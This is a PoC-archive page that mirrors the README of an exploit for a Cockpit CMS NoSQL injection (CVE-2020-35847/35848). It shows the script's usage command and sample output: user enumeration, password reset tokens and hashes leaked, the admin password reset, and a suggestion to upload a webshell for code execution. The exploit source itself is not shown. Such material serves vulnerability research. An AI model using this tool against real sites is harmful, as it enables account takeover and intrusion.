Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-35847 PoC — Agentejo Cockpit SQL注入漏洞

Source
https://github.com/w33vils/CVE-2020-35847_CVE-2020-35848
Associated Vulnerability
Title:Agentejo Cockpit SQL注入漏洞 (CVE-2020-35847)
Description:Agentejo Cockpit是德国Agentejo公司的一款用于管理网站结构化内容的管理系统。 Agentejo Cockpit 0.11.2之前版本存在SQL注入漏洞,该漏洞允许通过控制器Auth.php resetpassword函数注入NoSQL。
Description
CVE-2020-35847, CVE-2020-35848 : Account Takeover
Readme
# Cockpit CMS NoSQL Injection (CVE-2020-35847, CVE-2020-35848) 

Cockpit CMS before version 0.11.2 is vulnerable to a NoSQL Injection vulnerability in the **/auth/resetpassword** and /**auth/newpassword** that allows extraction of password reset tokens which allow for user details enumeration as well as password reset.

> Read More - https://swarm.ptsecurity.com/rce-cockpit-cms/

This python script enumerates users on the system, and resets the password.

# Usage

```bash
python3 exploit.py -u http://cockpit-site-url
```

The script first enumerates users on the system.
```bash
[+] http://cockpit-site-url: is reachable
[-] Attempting Username Enumeration (CVE-2020-35846) : 

[+] Users Found : ['admin', 'user1', 'user2', 'user3']
```
Then you can choose which user to gather more information on. This also generates reset tokens for that user, a key requirement in the password reset.

```bash
[-] Get user details For : admin
[+] Finding Password reset tokens
         Tokens Found : ['rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e']
[+] Obtaining user information 
-----------------Details--------------------
         [*] user : admin
         [*] name : Admin
         [*] email : admin@yourdomain.de
         [*] active : True
         [*] group : admin
         [*] password : $2y$10$6uQ2PXh4vShH.D4gw..WtO0NHQq7J36ugmwKNtJGzu9p9OqSEpVUW
         [*] i18n : en
         [*] _created : 1621655201
         [*] _modified : 1621655201
         [*] _id : 60a87ea165343539ee000300
         [*] _reset_token : rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e
         [*] md5email : a11eea8bf873a483db461bb169beccec
--------------------------------------------
```
Finally you can choose to reset the user's password.

```bash
[+] Do you want to reset the passowrd for admin? (Y/n): y
[-] Attempting to reset admin's password:
[+] Password Updated Succesfully!
[+] The New credentials for admin is: 
         Username : admin 
         Password : new_random_password
```

You can then choose to upload a webshell to the /finder component to gain RCE.
File Snapshot

 [4.0K]  /data/pocs/cc668aca4edac490cf4f4ac07033242869cfda16
├── [4.8K]  exploit.py
└── [2.0K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.